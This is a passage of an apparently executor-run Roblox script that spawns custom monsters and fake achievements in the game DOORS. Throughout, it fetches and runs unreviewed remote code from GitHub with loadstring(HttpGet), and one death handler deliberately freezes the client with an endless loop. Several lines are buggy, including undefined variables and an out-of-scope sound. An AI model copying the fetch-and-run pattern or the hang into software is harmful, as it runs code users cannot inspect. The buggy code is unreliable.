		if workspace.Ambience_FigureStart.Playing == true then
			continue
		end
		local Creator = loadstring(game:HttpGet("https://raw.githubusercontent.com/RegularVynixu/Utilities/main/Doors%20Entity%20Spawner/Source.lua"))()
		-- Create entity
		local entity = Creator.createEntity({
			Model = "12158222955",
			Speed = 50,
			DelayTime = 2,
			HeightOffset = 0,
			CanKill = true,
			BreakLights = true,
			FlickerLights = {
                            false,
				 4,
			},
			Cycles = {
				Min = 1,
				Max = 1,
				WaitTime = 0.1,
			},
			CamShake = {
				true,
				{5, 15, 0.1, 1},
				10,
			},
			Jumpscare = {
				true, -- Enabled ('false' if you don't want jumpscare)
				{
					Image1 = "rbxassetid://11394027278", -- Image1 url
					Image2 = "rbxassetid://11395249153", -- Image2 url
					Shake = true,
					Sound1 = {
						10483790459, -- SoundId
						{ Volume = 0.5 }, -- Sound properties
					},
					Sound2 = {
						10483837590, -- SoundId
						{ Volume = 0.5 }, -- Sound properties
					},
					Flashing = {
						true, -- Enabled
						Color3.fromRGB(48, 25, 52), -- Color
					},
					Tease = {
						false, -- Enabled ('false' if you don't want tease)
						Min = 1,
						Max = 1,
					},
				},
			},
			CustomDialog = {"You died to who you call Silence","Stay as silent as possible when you suspect its coming, so you know when to hide!","Its slow, but hard to hear","so hide!" }
		})

		local cameraShaker = require(game.ReplicatedStorage.CameraShaker)
		local camera = workspace.CurrentCamera

		local camShake = cameraShaker.new(Enum.RenderPriority.Camera.Value, function(cf)
			camera.CFrame = camera.CFrame * cf
		end)
		-----[[ Advanced ]]-----
		entity.Debug.OnEntitySpawned = function(entity)

		end

		entity.Debug.OnEntityDespawned = function(entity)
			if getgenv().death == false then
				getgenv().Title = "Eyes Closed Ears open" --Title Here
				getgenv().Description = "Stay silent or I wont be heard" --Description Here
				getgenv().Reason = "Encounter Silence" --Reason Here
				getgenv().BadgeId = 2129524598  --Replace Number with Your Badge ID
				getgenv().Category = 10 --You can replace the Category or dont

				local Unlock = require(game.Players.LocalPlayer.PlayerGui.MainUI.Initiator.Main_Lobby.RemoteListener.Modules.AchievementUnlock)
				local Achievements = debug.getupvalue(Unlock, 1)
				for i,v in pairs(require(game:GetService("ReplicatedStorage").Achievements)) do
					v.Title = getgenv().Title
					v.Desc = getgenv().Description
					v.Reason = getgenv().Reason
					v.BadgeId = getgenv().BadgeId
					v.Category = getgenv().Category
				end
				Unlock(nil,"Join")
			end
		end

		entity.Debug.OnEntityStartMoving = function(entity)

		end

		entity.Debug.OnEntityFinishedRebound = function(entity)

		end

		entity.Debug.OnDeath = function()
		    firesignal(game.ReplicatedStorage.EntityInfo.DeathHint.OnClientEvent, {"You died to who you call Silence","Stay as silent as possible when you suspect its coming, so you know when to hide!","Its slow, but hard to hear","so hide!"}, "Blue")
			getgenv().death = true
		end
		---------------------------
		-- Run the created entity
		Creator.runEntity(entity)
	end
end)




wait(242)
game:GetService("ReplicatedStorage").GameData.LatestRoom:GetPropertyChangedSignal("Value"):Wait()   
game.Lighting.MainColorCorrection.TintColor = Color3.fromRGB(61, 171, 98)
game.Lighting.MainColorCorrection.Contrast = 0.2
game.Lighting.MainColorCorrection.Saturation = -0.7
local tween = game:GetService("TweenService")
tween:Create(game.Lighting.MainColorCorrection, TweenInfo.new(5), {Contrast = 0}):Play()
tween:Create(game.Lighting.MainColorCorrection, TweenInfo.new(5), {Saturation = 0}):Play()
local TweenService = game:GetService("TweenService")
local TW = TweenService:Create(game.Lighting.MainColorCorrection, TweenInfo.new(5),{TintColor = Color3.fromRGB(255, 255, 255)})
TW:Play()
local cue1 = Instance.new("Sound")
cue1.Parent = game.Workspace
cue1.Name = "Scream"
cue1.SoundId = "rbxassetid://9114397505"
local distort = Instance.new("DistortionSoundEffect")
distort.Parent = cue1
distort.Level = 1
local distort2 = Instance.new("DistortionSoundEffect")
distort2.Parent = cue1
distort2.Level = 1
local pitch = Instance.new("PitchShiftSoundEffect")
pitch.Parent = cue1
pitch.Octave = 0.5
local pitch2 = Instance.new("PitchShiftSoundEffect")
pitch2.Parent = cue1
pitch2.Octave = 0.5
local pitch3 = Instance.new("PitchShiftSoundEffect")
pitch3.Parent = cue1
pitch3.Octave = 0.5
cue1.Volume = 0.1
cue1:Play()
local cue2 = Instance.new("Sound")
cue2.Parent = game.Workspace
cue2.Name = "Spawn"
cue2.SoundId = "rbxassetid://9114221327"
cue2.Volume = 3
cue2:Play()
local CameraShaker = require(game.ReplicatedStorage.CameraShaker)
local camara = game.Workspace.CurrentCamera
local camShake = CameraShaker.new(Enum.RenderPriority.Camera.Value, function(shakeCf)
	camara.CFrame = camara.CFrame * shakeCf
end)
camShake:Start()
camShake:ShakeOnce(10,3,0.1,6,2,0.5)
wait(2.8)
function GetGitSound(GithubSnd,SoundName)
	local url=GithubSnd
	if not isfile(SoundName..".mp3") then
		writefile(SoundName..".mp3", game:HttpGet(url))
	end
	local sound=Instance.new("Sound")
	sound.SoundId=(getcustomasset or getsynasset)(SoundName..".mp3")
	return sound
end


local Creator = loadstring(game:HttpGet("https://raw.githubusercontent.com/RegularVynixu/Utilities/main/Doors%20Entity%20Spawner/Source.lua"))()

-- Create entity

local entity = Creator.createEntity({
    CustomName = "Rebound", -- Custom name of your entity
    Model = "rbxassetid://11411313091", -- Can be GitHub file or rbxassetid
    Speed = 100, -- Percentage, 100 = default Rush speed
    DelayTime = 1.4, -- Time before starting cycles (seconds)
    HeightOffset = 1,
    CanKill = true,
    BreakLights = false,
    KillRange = 30,
    BackwardsMovement = true,
    FlickerLights = {
        false, -- Enabled
        2.5, -- Time (seconds)
    },
    Cycles = {
        Min = 1,
        Max = 1
    },
    CamShake = {
        true, -- Enabled
        {7, 17, 0.1, 1}, -- Shake values (don't change if you don't know)
        100, -- Shake start distance (from Entity to you)
    },
    Jumpscare = {
        false, -- Enabled ('false' if you don't want jumpscare)
        {
            Image1 = "rbxassetid://236777652", -- Image1 url
            Image2 = "rbxassetid://10914800940", -- Image2 url
            Shake = false,
            Sound1 = {
                0, -- SoundId
                { Volume = 0.5 }, -- Sound properties
            },
            Sound2 = {
                5567523008, -- SoundId
                { Volume = 0.5 }, -- Sound properties
            },
            Flashing = {
                true, -- Enabled
                Color3.fromRGB(6, 38, 135), -- Color
            },
            Tease = {
                false, -- Enabled ('false' if you don't want tease)
                Min = 1,
                Max = 3,
            },
        },
    },
    CustomDialog = {"You died to Rebound...", "It appears at the next door and has a chance to stay there or run back to the latest door.", "He will come back many times after his initial spawn", "so hide every next door until it is safe.."}, -- Custom death message (can be as long as you want)
})

-----[[ Advanced ]]-----

entity.Debug.OnEntityEnteredRoom = function(room)
    print("Entity:", entity, "has entered room:", room)
end

entity.Debug.OnEntitySpawned = function(entityModel)
    print("Entity has spawned:", entityModel)
    local sound = GetGitSound("https://github.com/Brololto/Reboundmoving/blob/main/Screen_Recording_20230404-140647_Chrome%20(online-audio-converter.com).mp3?raw=true","Rebounmovingsoud")
    sound.Parent = workspace
    sound.Volume = 3
	sound:Play()
end

entity.Debug.OnEntityDespawned = function(entityModel)
    print("Entity has despawned:", entityModel)
end

entity.Debug.OnEntityStartMoving = function(entityModel)
    print("Entity has started moving:", entityModel)
end

entity.Debug.OnEntityFinishedRebound = function(entityModel)
    print("Entity finished rebound:", entityModel)
end

entity.Debug.OnDeath = function()
    warn("You died.")
loadstring(game:HttpGet("https://raw.githubusercontent.com/check78/Jumpscares/main/ReboundJumpscare.txt"))()
wait(1.2)
    firesignal(game.ReplicatedStorage.EntityInfo.DeathHint.OnClientEvent, {"You died to Rebound...", "It appears at the next door and has a chance to stay there or run back to the latest door.", "He will come back many times after his initial spawn", "so hide every next door until it is safe.."}, "Blue")

	local ReSt = game.ReplicatedStorage
	local Plr = game.Players.LocalPlayer
sound:Destroy()
		
	    ReSt.GameStats["Player_".. Plr.Name].Total.DeathCause.Value = "Rebound"
		

end

------------------------

-- Run the created entity
Creator.runEntity(entity)


game.ReplicatedStorage.GameData.LatestRoom.Changed:Wait()

function GetGitSound(GithubSnd,SoundName)
	local url=GithubSnd
	if not isfile(SoundName..".mp3") then
		writefile(SoundName..".mp3", game:HttpGet(url))
	end
	local sound=Instance.new("Sound")
	sound.SoundId=(getcustomasset or getsynasset)(SoundName..".mp3")
	return sound
end


local Creator = loadstring(game:HttpGet("https://raw.githubusercontent.com/RegularVynixu/Utilities/main/Doors%20Entity%20Spawner/Source.lua"))()

-- Create entity

local entity = Creator.createEntity({
    CustomName = "Rebound", -- Custom name of your entity
    Model = "rbxassetid://11411313091", -- Can be GitHub file or rbxassetid
    Speed = 100, -- Percentage, 100 = default Rush speed
    DelayTime = 1.4, -- Time before starting cycles (seconds)
    HeightOffset = 1,
    CanKill = true,
    BreakLights = false,
    KillRange = 30,
    BackwardsMovement = true,
    FlickerLights = {
        false, -- Enabled
        2.5, -- Time (seconds)
    },
    Cycles = {
        Min = 1,
        Max = 1
    },
    CamShake = {
        true, -- Enabled
        {7, 17, 0.1, 1}, -- Shake values (don't change if you don't know)
        100, -- Shake start distance (from Entity to you)
    },
    Jumpscare = {
        false, -- Enabled ('false' if you don't want jumpscare)
        {
            Image1 = "rbxassetid://236777652", -- Image1 url
            Image2 = "rbxassetid://10914800940", -- Image2 url
            Shake = false,
            Sound1 = {
                0, -- SoundId
                { Volume = 0.5 }, -- Sound properties
            },
            Sound2 = {
                5567523008, -- SoundId
                { Volume = 0.5 }, -- Sound properties
            },
            Flashing = {
                true, -- Enabled
                Color3.fromRGB(6, 38, 135), -- Color
            },
            Tease = {
                false, -- Enabled ('false' if you don't want tease)
                Min = 1,
                Max = 3,
            },
        },
    },
    CustomDialog = {"You died to Rebound...", "It appears at the next door and has a chance to stay there or run back to the latest door.", "He will come back many times after his initial spawn", "so hide every next door until it is safe.."}, -- Custom death message (can be as long as you want)
})

-----[[ Advanced ]]-----

entity.Debug.OnEntityEnteredRoom = function(room)
    print("Entity:", entity, "has entered room:", room)
end

entity.Debug.OnEntitySpawned = function(entityModel)
    print("Entity has spawned:", entityModel)
    local sound = GetGitSound("https://github.com/Brololto/Reboundmoving/blob/main/Screen_Recording_20230404-140647_Chrome%20(online-audio-converter.com).mp3?raw=true","Rebounmovingsoud")
    sound.Parent = workspace
    sound.Volume = 3
	sound:Play()
end

entity.Debug.OnEntityDespawned = function(entityModel)
    print("Entity has despawned:", entityModel)
end

entity.Debug.OnEntityStartMoving = function(entityModel)
    print("Entity has started moving:", entityModel)
end

entity.Debug.OnEntityFinishedRebound = function(entityModel)
    print("Entity finished rebound:", entityModel)
end

entity.Debug.OnDeath = function()
    warn("You died.")
loadstring(game:HttpGet("https://raw.githubusercontent.com/check78/Jumpscares/main/ReboundJumpscare.txt"))()
wait(1.2)
    firesignal(game.ReplicatedStorage.EntityInfo.DeathHint.OnClientEvent, {"You died to Rebound...", "It appears at the next door and has a chance to stay there or run back to the latest door.", "He will come back many times after his initial spawn", "so hide every next door until it is safe.."}, "Blue")

	local ReSt = game.ReplicatedStorage
	local Plr = game.Players.LocalPlayer
sound:Destroy()
		
	    ReSt.GameStats["Player_".. Plr.Name].Total.DeathCause.Value = "Rebound"
		

end

------------------------

-- Run the created entity
Creator.runEntity(entity)

game.ReplicatedStorage.GameData.LatestRoom.Changed:Wait()



function GetGitSound(GithubSnd,SoundName)
	local url=GithubSnd
	if not isfile(SoundName..".mp3") then
		writefile(SoundName..".mp3", game:HttpGet(url))
	end
	local sound=Instance.new("Sound")
	sound.SoundId=(getcustomasset or getsynasset)(SoundName..".mp3")
	return sound
end


local Creator = loadstring(game:HttpGet("https://raw.githubusercontent.com/RegularVynixu/Utilities/main/Doors%20Entity%20Spawner/Source.lua"))()

-- Create entity

local entity = Creator.createEntity({
    CustomName = "Rebound", -- Custom name of your entity
    Model = "rbxassetid://11411313091", -- Can be GitHub file or rbxassetid
    Speed = 100, -- Percentage, 100 = default Rush speed
    DelayTime = 1.4, -- Time before starting cycles (seconds)
    HeightOffset = 0,
    CanKill = true,
    BreakLights = false,
    KillRange = 30,
    BackwardsMovement = false,
    FlickerLights = {
        false, -- Enabled
        2.5, -- Time (seconds)
    },
    Cycles = {
        Min = 1,
        Max = 1
    },
    CamShake = {
        true, -- Enabled
        {7, 17, 0.1, 1}, -- Shake values (don't change if you don't know)
        100, -- Shake start distance (from Entity to you)
    },
    Jumpscare = {
        false, -- Enabled ('false' if you don't want jumpscare)
        {
            Image1 = "rbxassetid://236777652", -- Image1 url
            Image2 = "rbxassetid://10914800940", -- Image2 url
            Shake = false,
            Sound1 = {
                0, -- SoundId
                { Volume = 0.5 }, -- Sound properties
            },
            Sound2 = {
                5567523008, -- SoundId
                { Volume = 0.5 }, -- Sound properties
            },
            Flashing = {
                true, -- Enabled
                Color3.fromRGB(6, 38, 135), -- Color
            },
            Tease = {
                false, -- Enabled ('false' if you don't want tease)
                Min = 1,
                Max = 3,
            },
        },
    },
    CustomDialog = {"You died to Rebound...", "It appears at the next door and has a chance to stay there or run back to the latest door.", "He will come back many times after his initial spawn", "so hide every next door until it is safe.."}, -- Custom death message (can be as long as you want)
})

-----[[ Advanced ]]-----

entity.Debug.OnEntityEnteredRoom = function(room)
    print("Entity:", entity, "has entered room:", room)
end

entity.Debug.OnEntitySpawned = function(entityModel)
    print("Entity has spawned:", entityModel)
    local sound = GetGitSound("https://github.com/Brololto/Reboundmoving/blob/main/Screen_Recording_20230404-140647_Chrome%20(online-audio-converter.com).mp3?raw=true","Rebounmovingsoud")
    sound.Parent = workspace
    sound.Volume = 3
	sound:Play()
end

entity.Debug.OnEntityDespawned = function(entityModel)
    print("Entity has despawned:", entityModel)
end

entity.Debug.OnEntityStartMoving = function(entityModel)
    print("Entity has started moving:", entityModel)
end

entity.Debug.OnEntityFinishedRebound = function(entityModel)
    print("Entity finished rebound:", entityModel)
end

entity.Debug.OnDeath = function()
    warn("You died.")
loadstring(game:HttpGet("https://raw.githubusercontent.com/check78/Jumpscares/main/ReboundJumpscare.txt"))()
wait(1.2)
    firesignal(game.ReplicatedStorage.EntityInfo.DeathHint.OnClientEvent, {"You died to Rebound...", "It appears at the next door and has a chance to stay there or run back to the latest door.", "He will come back many times after his initial spawn", "so hide every next door until it is safe.."}, "Blue")

	local ReSt = game.ReplicatedStorage
	local Plr = game.Players.LocalPlayer
sound:Destroy()
		
	    ReSt.GameStats["Player_".. Plr.Name].Total.DeathCause.Value = "Rebound"
		

end

------------------------

-- Run the created entity
Creator.runEntity(entity)


game.ReplicatedStorage.GameData.LatestRoom.Changed:Wait()



function GetGitSound(GithubSnd,SoundName)
	local url=GithubSnd
	if not isfile(SoundName..".mp3") then
		writefile(SoundName..".mp3", game:HttpGet(url))
	end
	local sound=Instance.new("Sound")
	sound.SoundId=(getcustomasset or getsynasset)(SoundName..".mp3")
	return sound
end


local Creator = loadstring(game:HttpGet("https://raw.githubusercontent.com/RegularVynixu/Utilities/main/Doors%20Entity%20Spawner/Source.lua"))()

-- Create entity

local entity = Creator.createEntity({
    CustomName = "Rebound", -- Custom name of your entity
    Model = "rbxassetid://11411313091", -- Can be GitHub file or rbxassetid
    Speed = 100, -- Percentage, 100 = default Rush speed
    DelayTime = 5, -- Time before starting cycles (seconds)
    HeightOffset = 1,
    CanKill = true,
    BreakLights = false,
    KillRange = 30,
    BackwardsMovement = true,
    FlickerLights = {
        false, -- Enabled
        2.5, -- Time (seconds)
    },
    Cycles = {
        Min = 1,
        Max = 1
    },
    CamShake = {
        true, -- Enabled
        {7, 17, 0.1, 1}, -- Shake values (don't change if you don't know)
        100, -- Shake start distance (from Entity to you)
    },
    Jumpscare = {
        false, -- Enabled ('false' if you don't want jumpscare)
        {
            Image1 = "rbxassetid://236777652", -- Image1 url
            Image2 = "rbxassetid://10914800940", -- Image2 url
            Shake = false,
            Sound1 = {
                0, -- SoundId
                { Volume = 0.5 }, -- Sound properties
            },
            Sound2 = {
                5567523008, -- SoundId
                { Volume = 0.5 }, -- Sound properties
            },
            Flashing = {
                true, -- Enabled
                Color3.fromRGB(6, 38, 135), -- Color
            },
            Tease = {
                false, -- Enabled ('false' if you don't want tease)
                Min = 1,
                Max = 3,
            },
        },
    },
    CustomDialog = {"You died to Rebound...", "It appears at the next door and has a chance to stay there or run back to the latest door.", "He will come back many times after his initial spawn", "so hide every next door until it is safe.."}, -- Custom death message (can be as long as you want)
})

-----[[ Advanced ]]-----

entity.Debug.OnEntityEnteredRoom = function(room)
    print("Entity:", entity, "has entered room:", room)
end

entity.Debug.OnEntitySpawned = function(entityModel)
    print("Entity has spawned:", entityModel)
    local sound = GetGitSound("https://github.com/Brololto/Reboundmoving/blob/main/Screen_Recording_20230404-140647_Chrome%20(online-audio-converter.com).mp3?raw=true","Rebounmovingsoud")
    sound.Parent = workspace
    sound.Volume = 3
	sound:Play()
end

entity.Debug.OnEntityDespawned = function(entityModel)
    print("Entity has despawned:", entityModel)
    getgenv().Title = "i always come back" --Title Here
					getgenv().Description = "I come back each door" --Description Here
					getgenv().Reason = "Encounter Rebound." --Reason Here
					getgenv().BadgeId = 2143554429 --Replace Number with Your Badge ID
					getgenv().Category = 10 --You can replace the Category or dont

					local Unlock = require(game.Players.LocalPlayer.PlayerGui.MainUI.Initiator.Main_Lobby.RemoteListener.Modules.AchievementUnlock)
					local Achievements = debug.getupvalue(Unlock, 1)
					for i,v in pairs(require(game:GetService("ReplicatedStorage").Achievements)) do
						v.Title = getgenv().Title
						v.Desc = getgenv().Description
						v.Reason = getgenv().Reason
						v.BadgeId = getgenv().BadgeId
						v.Category = getgenv().Category
					end
					Unlock(nil,"Join")
end

entity.Debug.OnEntityStartMoving = function(entityModel)
    print("Entity has started moving:", entityModel)
end

entity.Debug.OnEntityFinishedRebound = function(entityModel)
    print("Entity finished rebound:", entityModel)
end

entity.Debug.OnDeath = function()
    warn("You died.")
loadstring(game:HttpGet("https://raw.githubusercontent.com/check78/Jumpscares/main/ReboundJumpscare.txt"))()
wait(1)
    firesignal(game.ReplicatedStorage.EntityInfo.DeathHint.OnClientEvent, {"You died to Rebound...", "It appears at the next door and has a chance to stay there or run back to the latest door.", "He will come back many times after his initial spawn", "so hide every next door until it is safe.."}, "Blue")

	local ReSt = game.ReplicatedStorage
	local Plr = game.Players.LocalPlayer
sound:Destroy()
		
	    ReSt.GameStats["Player_".. Plr.Name].Total.DeathCause.Value = "Rebound"
		

end

------------------------

-- Run the created entity
Creator.runEntity(entity)
         
       





spawn(function() ---------------------The entitys Real Name Is The Slime Monster
while true do
wait(385)
if workspace.Ambience_Seek.Playing == true then
			continue
		end
		if workspace.Ambience_Figure.Playing == true then
			continue
		end
		if workspace.Ambience_FigureEnd.Playing == true then
			continue
		end
		if workspace.Ambience_FigureStart.Playing == true then
			continue
		end
	 local Creator = loadstring(game:HttpGet("https://raw.githubusercontent.com/RegularVynixu/Utilities/main/Doors%20Entity%20Spawner/Source.lua"))()
			-- Create entity
			local entity = Creator.createEntity({
				Model = "https://github.com/Brololto/NEWV2/blob/main/specimen_2_remodel_fixed.rbxm?raw=true",
				Speed = 25,
				DelayTime = 0,
				HeightOffset = 0,
				CanKill = true,
				BreakLights = true,
				FlickerLights = {
					true,
					80,
				},
				Cycles = {
					Min = 1,
					Max = 1,
					WaitTime = 0.1,
				},
				CamShake = {
					true,
					{5, 15, 0.1, 1},
					10,
				},
				Jumpscare = {
					false, -- Enabled ('false' if you don't want jumpscare)
					{
						Image1 = "rbxassetid://11394027278", -- Image1 url
						Image2 = "rbxassetid://11395249153", -- Image2 url
						Shake = true,
						Sound1 = {
							10483790459, -- SoundId
							{ Volume = 0.5 }, -- Sound properties
						},
						Sound2 = {
							10483837590, -- SoundId
							{ Volume = 0.5 }, -- Sound properties
						},
						Flashing = {
							true, -- Enabled
							Color3.fromRGB(48, 25, 52), -- Color
						},
						Tease = {
							false, -- Enabled ('false' if you don't want tease)
							Min = 1,
							Max = 1,
						},
					},
				},
				CustomDialog = {"You died to whom you call The Deer God","Closets Wont work! So try running","Its form is incomprehensible to a human upclose...","..-so avoid Eye Contact" }
			})
			local function GetGitSound(GithubSnd,SoundName)
				local url=GithubSnd
				if not isfile(SoundName..".mp3") then
					writefile(SoundName..".mp3", game:HttpGet(url))
				end
				local sound=Instance.new("Sound")
				sound.SoundId=(getcustomasset or getsynasset)(SoundName..".mp3")
				return sound
			end
			local Chase = GetGitSound("https://github.com/Brololto/SPECYYYY2CHASSE/blob/main/Screen_Recording_20230331-232129_YouTube.mp3?raw=true","Specimen2chase")
			Chase.Parent = workspace
			Chase.Volume = 6
			local cameraShaker = require(game.ReplicatedStorage.CameraShaker)
			local camera = workspace.CurrentCamera

			local camShake = cameraShaker.new(Enum.RenderPriority.Camera.Value, function(cf)
				camera.CFrame = camera.CFrame * cf
			end)
			camShake:Start()
			-----[[ Advanced ]]-----
			entity.Debug.OnEntitySpawned = function(entity)

				Chase:Play()
				game.TweenService:Create(Chase,TweenInfo.new(5),{Volume = 0.7}):Play()
				camShake:ShakeSustain(cameraShaker.Presets.Earthquake)
			end

			entity.Debug.OnEntityDespawned = function(entity)
				local Achievements = loadstring(game:HttpGet("https://raw.githubusercontent.com/RegularVynixu/Utilities/main/Doors/Custom%20Achievements/Source.lua"))()

-- Creates and displays your custom achievement
Achievements.Get({
    Title = "It Walks.",
    Desc = "i need to run.",
    Reason = "Survive Specimen 2",
    Image = "https://github.com/Brololto/Specimen-2-Badge/blob/main/SeekPng.com_spookys-house-of-jumpscares_3482069.png?raw=true",
    })
			end

			entity.Debug.OnEntityStartMoving = function(entity)

			end

			entity.Debug.OnEntityFinishedRebound = function(entity)

			end

			entity.Debug.OnDeath = function()
				getgenv().death = true
				firesignal(game.ReplicatedStorage.EntityInfo.DeathHint.OnClientEvent, {"You died to whom you call Specimen 2", "Hiding will not work, It has your walkspeed through out the game.", "So all you can do is run."}, "Blue")
			end
			---------------------------

			-- Run the created entity
			Creator.runEntity(entity)
			end
			end)







spawn(function() -- scawy
while wait(420) do
if workspace.Ambience_Seek.Playing == true then
			continue
		end
		if workspace.Ambience_Figure.Playing == true then
			continue
		end
		if workspace.Ambience_FigureEnd.Playing == true then
			continue
		end
		if workspace.Ambience_FigureStart.Playing == true then
			continue
		end
game:GetService("ReplicatedStorage").GameData.LatestRoom:GetPropertyChangedSignal("Value"):Wait()
local Creator = loadstring(game:HttpGet("https://raw.githubusercontent.com/RegularVynixu/Utilities/main/Doors%20Entity%20Spawner/Source.lua"))()


-- Create entity
 
game.Lighting.MainColorCorrection.TintColor = Color3.fromRGB(180, 225, 1000)
game.Lighting.MainColorCorrection.Contrast = 1
local tween = game:GetService("TweenService")
tween:Create(game.Lighting.MainColorCorrection, TweenInfo.new(2.5), {Contrast = 0}):Play()
local TweenService = game:GetService("TweenService")
local TW = TweenService:Create(game.Lighting.MainColorCorrection, TweenInfo.new(3),{TintColor = Color3.fromRGB(255, 255, 255)})
TW:Play()
 
local entity = Creator.createEntity({
    CustomName = "Trauma", -- Custom name of your entity
    Model = "https://github.com/Brololto/NEWV2/blob/main/BRAIN_DAMAGED_TRAUMA.rbxm?raw=true", -- Can be GitHub file or rbxassetid
    Speed = 600, -- Percentage, 100 = default Rush speed
    DelayTime = 3, -- Time before starting cycles (seconds)
    HeightOffset = 0,
    CanKill = true,
    BreakLights = true,
    KillRange = 100,
    FlickerLights = {
        false, -- Enabled
        5, -- Time (seconds)
    },
    Cycles = {
        Min = 1,
        Max = 2,
        WaitTime = 1,
    },
    CamShake = {
        true, -- Enabled
        {5, 15, 0.1, 1}, -- Shake values (don't change if you don't know)
        100, -- Shake start distance (from Entity to you)
    },
    Jumpscare = {
        true, -- Enabled ('false' if you don't want jumpscare)
        {
            Image1 = "rbxassetid://11287256504", -- Image1 url
            Image2 = "rbxassetid://11287256504", -- Image2 url
            Shake = true,
            Sound1 = {
                4903742660, -- SoundId
                { Volume = 1 }, -- Sound properties
            },
            Sound2 = {
                2738830850, -- SoundId
                { Volume = 15 }, -- Sound properties
            },
            Flashing = {
                true, -- Enabled
                Color3.fromRGB(255, 0, 0), -- Color
            },
            Tease = {
                true, -- Enabled ('false' if you don't want tease)
                Min = 1,
                Max = 3,
            },
        },
    },
    CustomDialog = {"What.. The Heck.. Just Happend?", "I Think Something's Wrong.", "Sorry About That, MidnightCyborg.", "His Presents Will Be Known", }, -- Custom death message (can be as long as you want)
})
 
----[[ Advanced ]]----
entity.Debug.OnEntitySpawned = function(entityModel)
    print("Entity has spawned:", entityModel)
end
 
entity.Debug.OnEntityDespawned = function(entityModel)
    print("Entity has despawned:", mentityModelodel)
local Achievements = loadstring(game:HttpGet("https://raw.githubusercontent.com/RegularVynixu/Utilities/main/Doors/Custom%20Achievements/Source.lua"))()

-- Creates and displays your custom achievement
Achievements.Get({
    Title = "AnPMqq.",
    Desc = "iuuIOlaP.",
    Reason = "Encounter Trauma",
    Image = "https://github.com/Brololto/Trauma-Badge/blob/main/pngaaa.com-690531.png?raw=true",
    })
end
 
entity.Debug.OnEntityStartMoving = function(entityModel)
    print("Entity has started moving:", entityModel)
end
 
entity.Debug.OnEntityFinishedRebound = function(entityModel)
    print("Entity finished rebound:", entityModel)
end
 
entity.Debug.OnDeath = function()
    warn("You died.")
        firesignal(game.ReplicatedStorage.EntityInfo.DeathHint.OnClientEvent, {"You died to Trauma", "Use what you learned from rush amd ambush, he is faster than them.", "pay attention to any cuses that hints at its arrival."}, "Blue")
end
------------------------
 
-- Run the created entity
Creator.runEntity(entity)
            pcall(scawy)
         end
end)






spawn(function()
		while wait(math.random(6,100)) do
		require(game.StarterGui.MainUI.Initiator.Main_Game.RemoteListener.Modules.Screech)(require(game.Players.LocalPlayer.PlayerGui.MainUI.Initiator.Main_Game),
workspace.CurrentRooms[game.Players.LocalPlayer:GetAttribute("CurrentRoom")])
            pcall(Screech)
         end
end)


















game.Workspace.Ambience_Figure.SoundId = game.Workspace.Ambience_FigureIntense.SoundId
game.Workspace.Ambience_Figure.Volume = "0.7"
if game.ReplicatedStorage.GameData.LatestRoom.Value == "50" then
end

------TERORROORO
coroutine.wrap(function ()
while true do
	wait(185) -- 185
	if (workspace.Ambience_Seek.Playing or workspace.Ambience_FigureIntense.Playing or workspace.Ambience_Seek.Playing) then

	if Beans == true and (not workspace.Ambience_Seek.Playing or not workspace.Ambience_FigureIntense.Playing)then
game:GetService("ReplicatedStorage").GameData.LatestRoom:GetPropertyChangedSignal("Value"):Wait()
    local room = workspace.CurrentRooms[game.Players.LocalPlayer:GetAttribute("CurrentRoom")]
local color = Color3.fromRGB(239, 62, 255)
		room.LightBase.SurfaceLight.Enabled = true
		room.LightBase.SurfaceLight.Color = color
		for _, thing in pairs(room.Assets:GetDescendants()) do
			if thing:FindFirstChild"LightFixture" then
				thing.LightFixture.Neon.Color = color
				for _, light in pairs(thing.LightFixture:GetChildren()) do
					if light:IsA("SpotLight") or light:IsA("PointLight") then
						light.Color = color
					end
				end
			end
		end
local Creator = loadstring(game:HttpGet("https://raw.githubusercontent.com/RegularVynixu/Utilities/main/Doors%20Entity%20Spawner/Source.lua"))()
-- Create entity

local entity = Creator.createEntity({
    CustomName = "Enraged Terror", -- Custom name of your entity
    Model = "https://github.com/Brololto/NEWENRAGEDTERRORHARDCORE/blob/main/enrager_terroror.rbxm?raw=true", -- Can be GitHub file or rbxassetid
    Speed = 940, -- Percentage, 100 = default Rush speed
    DelayTime = 3, -- Time before starting cycles (seconds)
    HeightOffset = 10,
    CanKill = true,
    BreakLights = false,
    KillRange = 40,
    BackwardsMovement = false,
    FlickerLights = {
        false, -- Enabled
        1, -- Time (seconds)
    },
    Cycles = {
        Min = 1,
        Max = 4
    },
    CamShake = {
        true, -- Enabled
        {30, 30, 0.1, 1}, -- Shake values (don't change if you don't know)
        100, -- Shake start distance (from Entity to you)
    },
    Jumpscare = {
        false, -- Enabled ('false' if you don't want jumpscare)
        {
            Image1 = "rbxassetid://115830521", -- Image1 url
            Image2 = "rbxassetid://11708346230", -- Image2 url
            Shake = false,
            Sound1 = {
                0, -- SoundId
                { Volume = 0.5 }, -- Sound properties
            },
            Sound2 = {
                5567523008, -- SoundId
                { Volume = 0.5 }, -- Sound properties
            },
            Flashing = {
                true, -- Enabled
                Color3.fromRGB(6, 38, 135), -- Color
            },
            Tease = {
                false, -- Enabled ('false' if you don't want tease)
                Min = 1,
                Max = 3,
            },
        },
    },
    CustomDialog = {"You died to Rebound...", "It appears at the next door and has a chance to stay there or run back to the latest door.", "He will come back many times after his initial spawn", "so hide every next door until it is safe.."}, -- Custom death message (can be as long as you want)
})

-----[[ Advanced ]]-----
entity.Debug.OnEntitySpawned = function(entityModel)
    print("Entity has spawned:", entityModel)
end

entity.Debug.OnEntityDespawned = function(entityModel)
    print("Entity has despawned:", entityModel)
end

entity.Debug.OnEntityStartMoving = function(entityModel)
    print("Entity has started moving:", entityModel)
end

entity.Debug.OnEntityEnteredRoom = function(entityTable, room)
    print("Entity:", "has entered room:", room)
end

entity.Debug.OnEntityFinishedRebound = function(entityModel)
    print("Entity finished rebound:", entityModel)
end

entity.Debug.OnDeath = function()
    warn("You died.")
    math.random(30,150)
while true do end
end
------------------------

-- Run the created entity
Creator.runEntity(entity)
end
	end

end
end)()
         






spawn(function() -- food dem
while wait(520) do
if workspace.Ambience_Seek.Playing == true then
			continue
		end
		if workspace.Ambience_Figure.Playing == true then
			continue
		end
		if workspace.Ambience_FigureEnd.Playing == true then
			continue
		end
		if workspace.Ambience_FigureStart.Playing == true then
			continue
		end
game:GetService("ReplicatedStorage").GameData.LatestRoom:GetPropertyChangedSignal("Value"):Wait()
function mesg(abb, last)
local TS = game:GetService("TweenService")
local message = Instance.new("ScreenGui")
message.Name = "CustomMessages"
message.Parent = game.Players.LocalPlayer.PlayerGui
local msg = Instance.new("Frame")
msg.Name = "msg"
msg.Parent = message
